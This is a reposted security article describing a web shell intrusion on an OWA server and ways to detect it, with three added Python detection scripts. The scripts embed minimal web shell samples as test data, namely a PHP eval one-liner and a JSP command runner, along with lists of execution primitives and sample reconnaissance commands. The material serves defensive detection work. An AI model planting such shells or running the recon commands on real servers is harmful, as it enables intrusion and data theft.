2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article shares a sample analysis of a web shell attack investigation. The editor considers it very practical, so it is shared here for reference; follow along with the editor below.
Recently, a misconfigured internet-facing server was discovered that allowed an attacker to deploy web shells in multiple folders on the web server, which led to the compromise of service accounts and domain administrator accounts. The attacker performed reconnaissance with net.exe, scanned for other target systems with nbtstat.exe, and eventually moved laterally with PsExec.
The attacker installed additional web shells on other systems and a DLL backdoor on the Outlook Web Access (OWA) server. To keep persistent control of the server, the backdoor registered itself as a service and as an Exchange transport agent, which let it access and intercept all incoming and outgoing e-mail and collect sensitive information. The backdoor also executed further attack commands and downloaded malicious payloads. In addition, the attacker sent specially crafted e-mails that the DLL backdoor interpreted as commands.
This case is an instance of one of the most common web attacks, affecting organizations across every sector. A web shell is malicious code written in a common web development language (such as ASP, PHP or JSP) that an attacker implants on a web server. It gives the attacker remote access to the server, lets them execute commands and code on it, and is used to steal data from the web server.
The current state of web shell attacks
Several threat actors, including ZINC, KRYPTON and GALLIUM, have been observed using web shells in their attacks. To plant a web shell, attackers exploit vulnerabilities in internet-exposed web servers, usually in web applications, such as CVE-2019-0604 or CVE-2019-16759.
In investigations of these attacks, the web shells were found trying to hide by blending in with legitimate file names on the web server, for example:
index.aspx
fonts.aspx
css.aspx
global.aspx
default.php
function.php
fileuploader.php
help.js
write.jsp
31.jsp
China Chopper is one of the most commonly used web shells. Common examples are as follows:
The JSP malicious code found on the server:
A China Chopper variant written in PHP:
KRYPTON uses a web shell written in C# inside an ASP.NET page:
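The common thread in the China Chopper family and the one-liner shells above is a request parameter that reaches a code-execution primitive (eval, exec, Process) inside a file that is named to look like legitimate web content. The following static triage script, added here as an example and not taken from the article or from any vendor tool, scans a web root for that pattern across PHP, JSP and ASP.NET files and ranks findings. All sample files, the score weights and the size cut-off are constructed for this example; the flagged PHP and JSP samples are minimal illustrations of the pattern rather than captures from the investigation.

```python
"""Static triage of a web root for web shell indicators (added example, not the article's code).

The sample files below are constructed for this example; the China Chopper-style PHP
one-liner and the JSP command runner are minimal illustrations of the pattern described
in the article: a request parameter fed straight into a code-execution primitive.
"""
import re
from dataclasses import dataclass, field

# Code-execution primitives used by China Chopper-style one-liners and other
# small web shells, grouped by server-side language.
EXEC_PRIMITIVES = {
    "php": [r"\beval\s*\(", r"\bassert\s*\(", r"\bsystem\s*\(", r"\bpassthru\s*\(",
            r"\bshell_exec\s*\(", r"\bpopen\s*\(", r"\bproc_open\s*\("],
    "jsp": [r"Runtime\.getRuntime\(\)\.exec", r"\bProcessBuilder\b", r"\bScriptEngine\b"],
    "aspx": [r"\beval\s*\(", r"System\.Diagnostics\.Process", r"\bExecute\s*\(",
             r"\bJScript\b"],
}

# How the shell pulls its payload out of the HTTP request.
REQUEST_INPUTS = {
    "php": [r"\$_(?:POST|GET|REQUEST|COOKIE)\b"],
    "jsp": [r"\brequest\.getParameter\s*\("],
    "aspx": [r"\bRequest\s*(?:\.\s*(?:Item|Form|QueryString|Params))?\s*\["],
}

# Decoding layers commonly wrapped around a payload to defeat naive string matching.
OBFUSCATION = [r"base64_decode\s*\(", r"FromBase64String", r"\bgzinflate\s*\(",
               r"\bstr_rot13\s*\(", r"\bunescape\s*\("]

# File names the article lists as used by attackers to blend in with legitimate content.
SUSPICIOUS_NAMES = {"index.aspx", "fonts.aspx", "css.aspx", "global.aspx", "default.php",
                    "function.php", "fileuploader.php", "help.js", "write.jsp", "31.jsp"}

EXT_FAMILY = {"php": "php", "phtml": "php", "jsp": "jsp", "jspx": "jsp",
              "aspx": "aspx", "asp": "aspx", "ashx": "aspx", "asmx": "aspx"}

# Constructed sample web root: relative path -> file content.
SAMPLE_WEB_ROOT = {
    # benign ASP.NET page: no request-driven code execution
    "owa/auth/index.aspx": '<%@ Page Language="C#" %>\n<html><body><h1>Sign in</h1></body></html>\n',
    # constructed China Chopper-style PHP one-liner hiding under a legitimate-looking name
    "wp-content/uploads/function.php": "<?php @eval($_POST['cmd']); ?>",
    # constructed JSP shell: command taken from a request parameter and passed to exec
    "app/write.jsp": ('<%@ page import="java.io.*" %><% String c = request.getParameter("cmd"); '
                      'Process p = Runtime.getRuntime().exec(c); %>'),
    # benign PHP: reads POST data but never executes it as code
    "login.php": "<?php $user = $_POST['user']; echo htmlspecialchars($user); ?>",
}


@dataclass
class Finding:
    path: str
    score: int = 0
    reasons: list = field(default_factory=list)


def _matches(patterns, text):
    return any(re.search(p, text, re.IGNORECASE | re.DOTALL) for p in patterns)


def score_file(path: str, content: str) -> Finding:
    """Score one file; a request parameter reaching an execution primitive is the strongest signal."""
    family = EXT_FAMILY.get(path.rsplit(".", 1)[-1].lower())
    families = [family] if family else list(EXEC_PRIMITIVES)  # unknown extension: check all
    f = Finding(path)
    has_exec = any(_matches(EXEC_PRIMITIVES[x], content) for x in families)
    has_input = any(_matches(REQUEST_INPUTS[x], content) for x in families)
    if has_exec and has_input:
        f.score += 70
        f.reasons.append("request parameter reaches a code-execution primitive")
    elif has_exec:
        f.score += 25
        f.reasons.append("code-execution primitive present")
    if has_exec and _matches(OBFUSCATION, content):
        f.score += 20
        f.reasons.append("payload decoding layer present")
    if f.score and path.rsplit("/", 1)[-1].lower() in SUSPICIOUS_NAMES:
        f.score += 10
        f.reasons.append("file name mimics legitimate web content")
    if f.score >= 70 and len(content) < 512:  # size cut-off is an assumption
        f.score += 10
        f.reasons.append("one-liner: full execution path in a very small file")
    return f


def scan_web_root(files: dict, threshold: int = 70) -> list:
    """Return findings scoring at or above threshold, highest first."""
    findings = (score_file(p, c) for p, c in files.items())
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


if __name__ == "__main__":
    for hit in scan_web_root(SAMPLE_WEB_ROOT):
        print(f"{hit.score:3d}  {hit.path}  ({'; '.join(hit.reasons)})")
```

Note that login.php reads $_POST but scores zero, because reading request data is normal; the signal is request data reaching an execution primitive. A real deployment would walk the actual web root with os.walk, compare against a known-good file inventory, and treat a hit on a file that is not in the inventory as a higher-priority case.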
Once a web shell has been planted on the web server, the attacker can perform a variety of tasks on it. Web shells can steal data, exploit further vulnerabilities, and run other malicious commands to cause further damage.
Web shells have affected many industries, and public sector organizations are among the most common targets. In addition to exploiting vulnerabilities in web applications or web servers, attackers also exploit other weaknesses in the server, such as missing security updates, missing anti-virus tools, missing network protection, and weak security configuration. Attacks usually occur on weekends or during holidays, when they may not be detected and responded to immediately. These attacks are so common that Microsoft Defender ATP detects an average of 77,000 web shell-related files on 46,000 distinct machines each month.
Detection and prevention
Because a web shell is a multifaceted threat, enterprises should build comprehensive defenses across multiple attack surfaces: authentication, endpoints, e-mail and data, applications, and infrastructure.
Understanding the internet-facing servers is key to detecting and resolving web shell threats. Web shell installation can be detected by monitoring file writes in web application directories. Applications such as Outlook Web Access (OWA) rarely change after installation, so writes to these application directories should be treated as suspicious.
Web shell activity can also be detected by analyzing the processes created by the Internet Information Services (IIS) worker process w3wp.exe, in particular process sequences associated with reconnaissance, such as net.exe, ping.exe, systeminfo.exe and hostname.exe. Any cmd.exe process started by w3wp.exe from an application pool that does not normally execute processes, such as "MSExchangeOWAAppPool", should be treated as an anomaly and potentially malicious.
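The two detections above, file writes into a web application directory that should be static and child processes of w3wp.exe, can be run over endpoint telemetry. The script below is an added example, not code from the article or from Microsoft: it reads constructed JSON lines in the shape of Sysmon event 11 (FileCreate) and event 1 (ProcessCreate), flags server-side script files written under the OWA directory, flags reconnaissance tools spawned by a worker process whose application pool is not expected to spawn anything, and then looks for the reconnaissance sequence across events. The OWA path is the default Exchange install location, and the pool allowlist (LegacyReportingAppPool) is an assumption made for the example.

```python
"""Triage of Sysmon-style endpoint telemetry for web shell activity on IIS (added example).

The events below are constructed JSON lines shaped like Sysmon event 11 (FileCreate)
and event 1 (ProcessCreate). The OWA path is the default Exchange install location;
the app-pool allowlist is an assumption for this example.
"""
import json
import re

# Web application directories that should not change after installation.
STATIC_WEB_DIRS = (
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",  # assumed default path
    r"C:\inetpub\wwwroot",
)
SERVER_SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")

# Reconnaissance and execution binaries the article associates with w3wp.exe children.
RECON_BINARIES = {"cmd.exe", "powershell.exe", "net.exe", "net1.exe", "ping.exe",
                  "systeminfo.exe", "hostname.exe", "whoami.exe", "nbtstat.exe", "psexec.exe"}

# App pools known (assumed here) to spawn child processes as part of normal operation.
POOLS_ALLOWED_TO_SPAWN = {"LegacyReportingAppPool"}  # assumption for the example

# w3wp.exe is started with -ap "<AppPoolName>", which names the pool the worker serves.
APP_POOL_RE = re.compile(r'-ap\s+"?([^"\s]+)"?')

SAMPLE_EVENTS = r"""
{"EventID": 11, "UtcTime": "2020-02-01 02:14:05", "Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "TargetFilename": "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\fonts.aspx"}
{"EventID": 11, "UtcTime": "2020-02-01 02:14:06", "Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "TargetFilename": "C:\\Windows\\Temp\\tmp1A2B.tmp"}
{"EventID": 1, "UtcTime": "2020-02-01 02:15:10", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "ParentCommandLine": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -l \"webengine4.dll\"", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c whoami"}
{"EventID": 1, "UtcTime": "2020-02-01 02:15:41", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "ParentCommandLine": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -l \"webengine4.dll\"", "Image": "C:\\Windows\\System32\\net.exe", "CommandLine": "net group \"domain admins\" /domain"}
{"EventID": 1, "UtcTime": "2020-02-01 02:16:02", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "ParentCommandLine": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -l \"webengine4.dll\"", "Image": "C:\\Windows\\System32\\PING.EXE", "CommandLine": "ping -n 1 fileserver01"}
{"EventID": 1, "UtcTime": "2020-02-01 02:20:00", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "ParentCommandLine": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"LegacyReportingAppPool\" -v \"v4.0\"", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c C:\\Reports\\nightly.bat"}
{"EventID": 1, "UtcTime": "2020-02-01 02:21:00", "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\Explorer.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd"}
"""


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def app_pool(w3wp_cmdline: str):
    """Extract the IIS application pool name from a w3wp.exe command line."""
    m = APP_POOL_RE.search(w3wp_cmdline or "")
    return m.group(1) if m else None


def check_event(ev: dict):
    """Return an alert string for one suspicious event, or None."""
    if ev.get("EventID") == 11 and basename(ev["Image"]) == "w3wp.exe":
        target = ev["TargetFilename"]
        if target.lower().endswith(SERVER_SCRIPT_EXTS) and any(
                target.lower().startswith(d.lower()) for d in STATIC_WEB_DIRS):
            return f"possible web shell drop: w3wp.exe wrote {target}"
    elif ev.get("EventID") == 1 and basename(ev["ParentImage"]) == "w3wp.exe":
        pool, child = app_pool(ev.get("ParentCommandLine")), basename(ev["Image"])
        if child in RECON_BINARIES and pool not in POOLS_ALLOWED_TO_SPAWN:
            return f"w3wp.exe ({pool}) spawned {child}: {ev.get('CommandLine')}"
    return None


def recon_sequences(events: list, min_distinct: int = 3) -> list:
    """Flag app pools whose worker spawned several distinct reconnaissance tools."""
    by_pool = {}
    for ev in events:
        if ev.get("EventID") == 1 and basename(ev["ParentImage"]) == "w3wp.exe":
            child = basename(ev["Image"])
            if child in RECON_BINARIES:
                by_pool.setdefault(app_pool(ev.get("ParentCommandLine")), set()).add(child)
    return [f"reconnaissance sequence from app pool {pool}: {', '.join(sorted(tools))}"
            for pool, tools in by_pool.items() if len(tools) >= min_distinct]


def triage(text: str) -> list:
    events = parse_events(text)
    alerts = [a for a in map(check_event, events) if a]
    return alerts + recon_sequences(events)


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The per-event rule catches the single cmd.exe from MSExchangeOWAAppPool; the sequence rule adds the context that the same pool then ran net.exe and ping.exe, which is the reconnaissance chain the article describes. The pool allowlist is the tuning knob: it should be built from a baseline of the server's own history, not guessed.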
As with most security issues, prevention is crucial. A system's resistance to web shell attacks can be improved with the following precautions:
1. Identify and remediate vulnerabilities and misconfigurations in web applications and web servers, and apply security updates promptly.
2. Regularly audit and review web server logs, paying particular attention to all systems directly exposed to the internet.
3. Use Windows Defender Firewall, intrusion prevention devices and network firewalls wherever possible to block command-and-control communication between endpoints and attacker servers, and to restrict lateral movement and other attacks.
4. Check perimeter firewalls and proxies to restrict unnecessary access to services, including access to services over non-standard ports.
5. Enable cloud-delivered protection to get the latest defenses.
6. Educate end users about preventing malware infections, and have them practise good credential hygiene by restricting the use of privileged accounts.
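Item 2 is the one most often skipped in practice, so here is what a web log audit for shell traffic can look like. This is an added example, not from the article: it parses IIS W3C extended log lines, builds per-endpoint statistics, and flags server-side script endpoints that see only POSTs from one or two client addresses with no Referer, which is the traffic shape of an operator driving a shell rather than a browser using the application. The log excerpt, the thresholds and the field order are constructed for the example; the parser reads the field order from the #Fields directive, so it adapts to whatever the server actually logs.

```python
"""Audit of IIS W3C extended logs for web shell traffic (added example, not the article's code).

The log excerpt is constructed. The heuristic targets the traffic shape of a planted shell:
repeated POSTs to a server-side script from one or two addresses with no Referer, whereas
real application endpoints are used by many clients and carry browser referers.
"""

SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")

# Constructed excerpt; spaces inside fields are '+' as IIS writes them.
SAMPLE_IIS_LOG = r"""
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-02-01 02:10:01 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.example.com/owa/ 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 120
2020-02-01 02:10:09 10.0.0.5 POST /owa/auth.owa - 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+10.0) https://mail.example.com/owa/auth/logon.aspx 302 0 0 88
2020-02-01 02:11:30 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.example.com/owa/ 443 - 198.51.100.22 Mozilla/5.0+(Macintosh) - 200 0 0 101
2020-02-01 02:12:45 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.example.com/owa/ 443 - 192.0.2.14 Mozilla/5.0+(iPhone) - 200 0 0 97
2020-02-01 02:14:30 10.0.0.5 POST /owa/auth/fonts.aspx - 443 - 203.0.113.9 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 45
2020-02-01 02:15:10 10.0.0.5 POST /owa/auth/fonts.aspx - 443 - 203.0.113.9 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 1310
2020-02-01 02:15:41 10.0.0.5 POST /owa/auth/fonts.aspx - 443 - 203.0.113.9 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 2204
2020-02-01 02:16:02 10.0.0.5 POST /owa/auth/fonts.aspx - 443 - 203.0.113.9 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 3012
2020-02-01 02:18:00 10.0.0.5 GET /owa/auth/fonts.aspx - 443 - 203.0.113.9 Mozilla/4.0+(compatible;+MSIE+6.0) - 200 0 0 12
2020-02-01 02:20:00 10.0.0.5 POST /api/upload.aspx - 443 DOMAIN\jdoe 198.51.100.7 Mozilla/5.0+(Windows+NT+10.0) https://mail.example.com/api/ 200 0 0 310
2020-02-01 02:21:00 10.0.0.5 POST /api/upload.aspx - 443 DOMAIN\asmith 198.51.100.40 Mozilla/5.0+(Windows+NT+10.0) https://mail.example.com/api/ 200 0 0 280
2020-02-01 02:22:00 10.0.0.5 POST /api/upload.aspx - 443 DOMAIN\kli 198.51.100.61 Mozilla/5.0+(Windows+NT+10.0) https://mail.example.com/api/ 200 0 0 295
"""


def parse_w3c(text: str) -> list:
    """Parse IIS W3C extended log lines into dicts keyed by the #Fields directive."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if len(values) == len(fields):  # skip truncated lines rather than misalign columns
                rows.append(dict(zip(fields, values)))
    return rows


def endpoint_stats(rows: list) -> dict:
    """Per server-side script endpoint: hit count, POST count, distinct clients, Referer-less hits."""
    stats = {}
    for r in rows:
        stem = r["cs-uri-stem"].lower()
        if not stem.endswith(SCRIPT_EXTS):
            continue
        s = stats.setdefault(stem, {"hits": 0, "posts": 0, "clients": set(),
                                    "no_referer": 0, "first": r["date"] + " " + r["time"]})
        s["hits"] += 1
        s["posts"] += r["cs-method"] == "POST"
        s["clients"].add(r["c-ip"])
        s["no_referer"] += r["cs(Referer)"] == "-"
    return stats


def suspicious_endpoints(rows: list, min_hits: int = 3, max_clients: int = 2,
                         min_post_ratio: float = 0.8) -> list:
    """Script endpoints driven by POSTs from one or two clients with no Referer (thresholds assumed)."""
    found = []
    for stem, s in endpoint_stats(rows).items():
        if (s["hits"] >= min_hits and len(s["clients"]) <= max_clients
                and s["posts"] / s["hits"] >= min_post_ratio
                and s["no_referer"] == s["hits"]):
            found.append({"uri": stem, "hits": s["hits"],
                          "clients": sorted(s["clients"]), "first_seen": s["first"]})
    return found


if __name__ == "__main__":
    for hit in suspicious_endpoints(parse_w3c(SAMPLE_IIS_LOG)):
        print(f"{hit['uri']}  hits={hit['hits']}  clients={hit['clients']}  first={hit['first_seen']}")
```

The first_seen timestamp is the pivot for the rest of the investigation: it bounds the window in which to look for the file write that created the endpoint and for the first w3wp.exe child process. The upload endpoint is not flagged, even though it is POST-only, because three different authenticated clients use it with a Referer, and that is the distinction the heuristic relies on.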
© 2024 shulou.com SLNews company. All rights reserved.